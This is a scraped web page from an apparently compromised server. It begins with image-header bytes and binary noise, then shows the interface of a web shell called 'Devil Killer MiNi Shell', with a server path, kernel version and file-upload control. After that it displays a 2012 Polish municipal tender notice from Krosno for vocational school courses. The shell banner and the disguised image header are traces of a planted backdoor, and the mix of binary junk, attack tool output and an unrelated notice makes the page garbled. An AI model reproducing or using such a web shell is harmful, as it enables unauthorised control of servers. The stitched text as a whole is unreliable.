JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121025/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121025/227047-N-2012.html

<p class="kh_header"><b>Krosno: Usługa edukacyjna obejmująca prowadzenie zajęć dodatkowych kursowych dla uczniów Zespołu Szkół Ponadgimnazjalnych Nr 3 w Krośnie, uczestników projektu pn. Podkarpacie stawia na zawodowców w roku szkolnym 2012/2013 i 2013/2014</b><br>
<b>Numer ogłoszenia: 227047 - 2012; data zamieszczenia: 25.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Krosno , ul. Lwowska 28a, 38-400 Krosno, woj. podkarpackie, tel. 13 47 43 312, faks 13 47 43 312.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krosno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa edukacyjna obejmująca prowadzenie zajęć dodatkowych kursowych dla uczniów Zespołu Szkół Ponadgimnazjalnych Nr 3 w Krośnie, uczestników projektu pn. Podkarpacie stawia na zawodowców w roku szkolnym 2012/2013 i 2013/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia składa się z III zadań (6 części). 
ZADANIE I
Przeprowadzenie zajęć kursowych z zakresu mechatroniki pojazdowej dla uczniów Zespołu Szkół Ponadgimnazjalnych Nr 3 w Krośnie, przy ul. Tysiąclecia 5.

Część 1. Przeprowadzenie  zajęć kursowych z zakresu mechatroniki pojazdowej dla uczniów Zespołu Szkół Ponadgimnazjalnych Nr 3 w Krośnie w roku szkolnym 2012/2013. 
Liczba grup w roku szkolnym 2012/2013 - 2: 
1) od XI/2012 do XII/2012-I grupa
2) od I/2013 do V/2013 -II grupa
Liczba uczniów w grupie w roku szkolnym 2012/2013 - 12
Liczba godzin przypadająca na każdą grupę w roku szkolnego 2012/2013 - 40 godz.:
1) od XI/2012 do XII/2013-40 godz.
2) od I/2013 do V/2013-	40 godz.
Czas realizacji - rok szkolny 2012/2013 
Termin rozpoczęcia zajęć w roku szkolnym 2012/2013
1) I grupa - XI/2012
2) II grupa - I/2013	

Część 2. Przeprowadzenie zajęć kursowych z zakresu mechatroniki pojazdowej dla uczniów Zespołu Szkół Ponadgimnazjalnych Nr 3 w Krośnie w roku szkolnym 2013/2014.

Liczba grup w roku szkolnym 2013/2014 - 2: 
1) od IX/2013 do XII/2013.-III grupa
2) od I/2014 do V/2014 - IV grupa
Liczba uczniów w grupie w roku szkolnym 2013/2014 - 12
Liczba godzin przypadająca na każdą grupę w roku szkolnego 2013/2014 - 40 godz.:
1) od IX/2013 do XII/2013 -40 godz.
2) od I/2014 do V/2014-40 godz.
Czas realizacji - rok szkolny 2013/2014 
Termin rozpoczęcia zajęć w roku szkolnym 2013/2014
1) III grupa - IX/2013
2) IV grupa -	I/2014	

Minimalny zakres zajęć:
1. czujniki i urządzenia pomiarowe stosowane w pojazdach,
2. diagnoskopy, interfejsy i czytniki diagnostyczne,
3. diagnostyka układów zasilania i sterowania silników z zapłonem iskrowym i samoczynnym,
4. diagnostyka układów bezpieczeństwa pojazdów.

ZADANIE II
Przeprowadzenie zajęć kursowych z zakresu operatora obrabiarek CNC  dla uczniów Zespołu Szkół Ponadgimnazjalnych Nr 3 w Krośnie, przy ul. Tysiąclecia 5.

Część 1. Przeprowadzenie  zajęć kursowych z zakresu operatora obrabiarek CNC  dla uczniów Zespołu Szkół Ponadgimnazjalnych Nr 3 w Krośnie w roku szkolnym 2012/2013. 
Liczba grup w roku szkolnym 2012/2013 - 2: 
1) od XI/2012 do XII/2012 - I grupa
2) od I/2013 do V/2013 -	II grupa
Liczba uczniów  w grupie w roku szkolnym 2012/2013 - 12
Liczba godzin przypadająca na każdą grupę w roku szkolnego 2012/2013 - 40 godz.:
1) od XI/2012 do XII/2012 - 40 godz.
2) od I/2013 do V/2013 -	40 godz.
Czas realizacji - rok szkolny 2012/2013 
Termin rozpoczęcia zajęć w roku szkolnym 2012/2013
1) I grupa -XI/2012
2) II grupa - I/2013	

Część 2. Przeprowadzenie  zajęć kursowych z zakresu operatora obrabiarek CNC  dla uczniów Zespołu Szkół Ponadgimnazjalnych Nr 3 w Krośnie w roku szkolnym 2013/2014.
Liczba grup w roku szkolnym 2013/2014 - 2: 
1) od IX/2013 do XII/2013 - III grupa
2) od I/2014 do V/2014-IV grupa
Liczba uczniów  w grupie w roku szkolnym 2013/2014 - 12
Liczba godzin przypadająca na każdą grupę w roku szkolnego 2013/20134 - 40 godz.:
1) od IX/2013 do XII/2013 - 40 godz.
2) od I/2014 do V/2014 -40 godz.
Czas realizacji - rok szkolny 2013/2014 
Termin rozpoczęcia zajęć w roku szkolnym 2013/2014
1) III grupa -	IX/2013
2) IV grupa-I/2014	

Minimalny zakres zajęć:
1. podstawy obróbki skrawaniem, pomiary warsztatowe
2. rodzaje i budowa OSN, punkty zerowe maszyny,
3. rodzaje i dobór narzędzi skrawających,
4. podstawy programowania SINUMERIK.

ZADANIE III
Przeprowadzenie zajęć kursowych obsługi samolotów ULF dla uczniów Zespołu Szkół Ponadgimnazjalnych Nr 3 w Krośnie, przy ul. Tysiąclecia 5

Część 1. Przeprowadzenie  zajęć kursowych obsługi samolotów  dla I grupy uczniów Zespołu Szkół Ponadgimnazjalnych Nr 3 w Krośnie w okresie od XI/2012 do XII/2012.
Liczba grup 	- 1: 
1) od XI/2012 do XII/2012-I grupa
Liczba uczniów w grupie -	12
Liczba godzin przypadająca na grupę -	40 godz.:
1) od XI/2012 do XII/2012- 40 godz.
Czas realizacji - od XI/2012 do XII/2012 
Termin rozpoczęcia zajęć:
1) I grupa- XI/2012
Część 2. Przeprowadzenie  zajęć kursowych obsługi samolotów ULF   dla II grupy uczniów Zespołu Szkół Ponadgimnazjalnych Nr 3 w Krośnie w okresie od IX/2013 do XII/2013
Liczba grup - 1: 
1) od IX/2013 do XII/2013 - II grupa
Liczba uczniów w grupie -	12
Liczba godzin przypadająca na grupę - 40 godz.:
1) od IX/2013 do XII/2013 - 40 godz.
Czas realizacji - od IX/2013 do XII/2013 
Termin rozpoczęcia zajęć:
1) II grupa - IX/2013

Minimalny zakres zajęć:
1) Ogólne wiadomości dotyczące prawa lotniczego
2) Technika lotnicza dotycząca samolotów ULF
3) Obsługa techniczna samolotów ultralekkich
4) Zasady lotu.
5) Diagnostyka urządzeń nawigacyjnych
6) Bezpieczeństwo obsługi samolotów ULF

Zajęcia będą prowadzone w salach dydaktycznych w/w placówki, wyposażonych w miejsca do siedzenia, pisania i prowadzenia zajęć, przystosowanych dla odpowiedniej liczby uczestników, wyposażone w odpowiedni sprzęt techniczno - dydaktyczny. 

W ramach umowy Wykonawca jest zobowiązany do:
1) realizacji w roku szkolnym 2012/2013 i 2013/2014 zajęć kursowych z zakresu mechatroniki pojazdowej, operatora obrabiarek CNC i obsługi samolotów ULF w wymiarze godzin przewidzianym dla każdego rodzaju zajęć i dla danej grupy uczniów, zgodnie z założeniami projektu, bezpośrednio przed lub po zajęciach określonych planem lekcji i zajęć pozalekcyjnych, w których uczniowie już uczestniczą. Zmiana godzin jest dopuszczalna jedynie za wcześniejszą pisemną zgodą koordynatora szkolnego i dyrektora szkoły. Dopuszcza się realizację zajęć w soboty lub/i w niedziele.
2) opracowania projektu autorskich programów zajęć obejmujący minimalny zakres zajęć z podaniem celu programu, proponowanych tematów, z opisem materiałów dydaktycznych i pomocy naukowych dostosowanych  do   potrzeb  uczniów i przedstawienia na minimum 2 dni przed rozpoczęciem zajęć, do akceptacji koordynatorowi szkolnemu i dyrektorowi szkoły;
3) opracowania szczegółowego harmonogramu prowadzenia zajęć, który powinien być  uzgodniony z koordynatorem szkolnym, zaakceptowany przez dyrektora szkoły i przekazany do biura projektu, 
4) uzgadniania z koordynatorem szkolnym oraz z dyrektorem szkoły wszelkich zmian harmonogramu wynikających z zaistnienia ważnych powodów; 
5) w pierwszym dniu, przed rozpoczęciem zajęć, zapoznanie uczestników z jego szczegółowym programem oraz przekazanie im harmonogram realizowanych zajęć,
6) systematycznego prowadzenia dokumentacji związanej z prowadzeniem danego rodzaju zajęć, tj. listy obecności,  dzienniki zajęć i inne dokumenty niezbędne dla potrzeb realizacji projektu; 
7) opracowania i bieżącego prowadzenia kart obserwacji uczniów i innej dokumentacji dotyczącej mierzenia wskaźników pomiaru celów projektu, zapisanych we wniosku o dofinansowanie; 
8) przygotowania i sporządzania w formie elektronicznej i papierowej sprawozdań kwartalnych z postępu realizacji działań wynikających z projektu, a merytorycznie związanych z realizacją określonego rodzaju zajęć. Sprawozdania składane będą do ostatniego dnia w danym kwartale i przekazywane do szkolnego koordynatora (nie dotyczy zajęć kursowych z obsługi samolotów ULF);
9) zapewnienia każdemu uczestnikowi zajęć materiałów piśmienniczych potrzebnych do prowadzenia notatek (notatnik, długopis);
10) przygotowania i przekazania koordynatorowi szkolnemu do dnia 27 czerwca 2014r., a w przypadku zajęć kursowych z obsługi samolotów ULF do 31 grudnia 2012r. i 31 grudnia 2013r.: 
a) kart obserwacji i innej dokumentacji dotyczącej mierzenia rezultatów projektu, w których zawarte będzie okresowe porównywanie wyników osiąganych przez uczniów, 
b) dzienników zajęć, 
c) raportu podsumowującego okres realizacji danego rodzaju zajęć;
11) Zamawiający w terminie 14 dni od dnia otrzymania dokumentów, o których mowa w pkt. 10 zawiadomi Wykonawcę o prawidłowym, bądź nieprawidłowym rozliczeniu przedmiotu umowy. W przypadku stwierdzenia błędów i braków Zamawiający wezwie Wykonawcę do ich uzupełnienia; 
12) opracowania i bieżącego prowadzenia kart ewidencji czasu pracy wskazujących liczbę przepracowanych godzin. Miesięczne karty czasu pracy składane będą w ostatnim dniu miesiąca, którego dotyczą (informacja przekazywana w formie elektronicznej i papierowej koordynatorowi projektu oraz dyrektorowi, w której realizowany jest projekt); 
13) gromadzenia wytworów pracy uczestników projektu; 
14) ścisłej współpracy z Zamawiającym; 
15) dodatkowego informowania o stanie realizacji przedmiotu zamówienia na wniosek Zamawiającego, Instytucji Pośredniczącej i innych osób uprawnionych do nadzoru; 
16) przestrzegania zasady równości szans, w tym równości płci w czasie przeprowadzanych zajęć dodatkowych i dydaktyczno - wyrównawczych w ramach realizacji przedmiotu zamówienia; 
17) zgłaszania ewentualnych problemów, nieprawidłowości niezwłocznie po zaobserwowaniu ich występowania;
18) na zakończenie zajęć kursowych przeprowadzenie egzaminu wewnętrznego sprawdzającego umiejętności uczniów. Na tej podstawie powinny być wydane stosowne dokumenty świadczące o ukończeniu kursu np: zaświadczenia, świadectwa, itp. zawierające dane uczestnika kursu oraz szczegółową tematykę kursu wraz z liczbą godzin przypadającą na poszczególne tematy;
19) przestrzegania  prawidłowej promocji projektu  poprzez wywieszenie plakatów, posługiwania się logotypami UE i POKL itp. zgodnie z wymaganymi w tym zakresie wytycznymi;
20) w przypadku  usprawiedliwionej nieobecności Wykonawca zapewni zastępstwo osoby prowadzącej zajęcia o takich samych kwalifikacjach i umiejętnościach jak osoba nieobecna.
Zakres obowiązków odnosi się do wszystkich wymienionych w przetargu części. 

Jednostka 1 godzina używana  w SIWZ odpowiada 45 minutom.

Zamawiający zapewnia:
1) ubezpieczenie uczestników kursów od następstw nieszczęśliwych wypadków na czas trwania kursu, zgodnie z wykazem osób przedstawionym przez Zamawiającego przed rozpoczęciem kursu,
2) nieodpłatnie pomieszczenia do przeprowadzenia wszystkich kursów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonania oceny spełniania warunku dla Zadania I, część 1 i 2. 
a) Zamawiający uzna powyższy warunek za spełniony o ile wykonawca wykaże, iż dysponuje osobą z wykształceniem wyższym inżynierskim - mechanik samochodowy lub mechatronik  - z przygotowaniem pedagogicznym. 
b) w/w osoba winna posiadać doświadczenie zawodowe w prowadzeniu zajęć z zakresu mechaniki lub/i mechatroniki pojazdowej.
Zamawiający uzna powyższy warunek za spełniony, o ile wykonawca wykaże, iż  w/w osoba w okresie ostatnich 3 lat przed upływem terminu składania ofert zrealizowała co najmniej dwa szkolenia tematyczne z zakresu mechaniki lub/i mechatroniki pojazdowej.

Opis sposobu dokonania oceny spełniania warunku dla Zadania II, część 1 i 2. 
a) Zamawiający uzna powyższy warunek za spełniony o ile wykonawca wykaże, iż dysponuje osobą z wykształceniem wyższym inżynierskim - z zakresu mechaniki - z przygotowaniem pedagogicznym. 
b) w/w osoba winna posiadać doświadczenie zawodowe w prowadzeniu zajęć z  zakresu operatora obrabiarek CNC.
Zamawiający uzna powyższy warunek za spełniony, o ile wykonawca wykaże, iż  w/w osoba w okresie ostatnich 3 lat przed upływem terminu składania ofert zrealizowała co najmniej dwa szkolenia tematyczne z zakresu operatora obrabiarek CNC.

Opis sposobu dokonania oceny spełniania warunku dla Zadania III, część 1 i 2. 
a) Zamawiający uzna powyższy warunek za spełniony o ile wykonawca wykaże, iż dysponuje osobą posiadającą licencję mechanika poświadczenia obsługi statku powietrznego, uprawnienia do obsługi samolotów ULF, praktykę szkoleniową w zakresie obsługi technicznej statków powietrznych oraz znajomość Prawa Lotniczego i właściwych przepisów lotniczych.

 Zamawiający dopuszcza również możliwość uznania uprawnień wynikających z innych niż krajowe przepisów np. treści dyrektyw, zawartych umów międzynarodowych i innych przepisów, które potwierdzą spełnianie warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo: Oferta musi być podpisana przez osobę/osoby wykonawcy uprawnioną/ne do zaciągania zobowiązań w Jego imieniu bądź przez ustanowionego przez nią/nie pełnomocnika/ów.
Wykonawcy składający ofertę wspólną są zobowiązani do ustanowienia pełnomocnika. 
Pełnomocnictwo może dotyczyć zarówno reprezentowania wszystkich wykonawców składających wspólną ofertę w postępowaniu o udzielenie zamówienia publicznego, jak i podpisania w ich imieniu umowy o zamówienie publiczne. Jeżeli pełnomocnictwo upoważnia jedynie do reprezentowania wykonawców w postępowaniu, to przed podpisaniem umowy z Zamawiającym wymagane będzie złożenie umowy, w której określone będą prawa i obowiązki poszczególnych wykonawców.
Pełnomocnictwo musi wskazywać pełnomocnika (w tym zakres jego umocowania), a także wskazywać wszystkich wykonawców wspólnie ubiegających się o zamówienie. 
Pełnomocnictwo musi być podpisane przez osoby wykonawców składających wspólną ofertę uprawnione do zaciągania zobowiązań w jego imieniu. 
Pełnomocnictwo, o którym mowa w niniejszym punkcie musi zostać złożone wraz z ofertą w formie oryginału lub kopii poświadczonej notarialnie.
Korespondencja z Zamawiającym oraz rozliczenia z wykonawcami dokonywane będą przez pełnomocnika wskazanego pełnomocnictwem. 
Podmiot składający ofertę jako uczestnik konsorcjum i jednocześnie składający ofertę samodzielnie lub jako uczestnik innego konsorcjum zostanie potraktowany jako składający dwie oferty i na tej podstawie wszystkie oferty z Jego udziałem zostaną odrzucone. Zasady podpisywania oferty dotyczą wszystkich jej dokumentów (informacji, wykazów, oświadczeń) oraz potwierdzania za zgodność z oryginałem składanych kopii</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następującym zakresie:
1. Termin realizacji zamówienia może ulec zmianie w następujących sytuacjach: 
a)	w przypadku opóźnienia Zamawiającego w rozstrzygnięciu przetargu i/lub podpisaniu umowy,
b)	w przypadku zawieszenia usług przez Zamawiającego.
2. Wynagrodzenie Wykonawcy określone w umowie może ulec zmianom w następujących przypadkach:
a)	zmiana stawki urzędowej podatku VAT,
b)	rezygnacji z części zamówienia, jeśli taka rezygnacja będzie niezbędna do prawidłowej realizacji przedmiotu umowy lub której wykonanie nie będzie konieczne lub będzie bezcelowe w przypadku zaistnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy - o wartość niewykonanych usług.
3. Warunki zmian:
a)	inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego,
b)	uzasadnienie zmian - prawidłowa realizacja przedmiotu umowy, obniżenie kosztów,
c)	forma zmian - aneks do umowy w formie pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krosno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można odebrać w siedzibie Zamawiającego - pokój nr 326, przy ul. Lwowskiej 28a w Krośnie - III piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.11.2012 godzina 10:00, miejsce: Krosno, ul. Lwowska 28a, Kancelaria Ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Podkarpacie stawia na zawodowców jest współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX, Działanie 9.2.
Informacja dodatkowa: postępowanie prowadzone jest w trybie przetargowym, gdyż jest ono częścią Projektu Podkarpacie stawia na zawodowców. Zamawiający w ramach usług dokona wydatkowania środków pieniężnych w wysokości znacznie przekraczającej 14.000 euro, jednak z przyczyn organizacyjnych usługi w ramach projektu będą podzielone na kilka odrębnych postępowań. Jednym z nich jest niniejsze postępowanie, którego wartość szacunkowa nie przekracza 14.000 EURO. 
Sposób porozumiewania się Zamawiającego z wykonawcami: 
1. Oświadczenia, wnioski, zawiadomienia oraz informacje dotyczące postępowania Zamawiający i wykonawcy przekazują pisemnie, drogą mailową lub faksem. Jeżeli Zamawiający lub wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub pocztą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
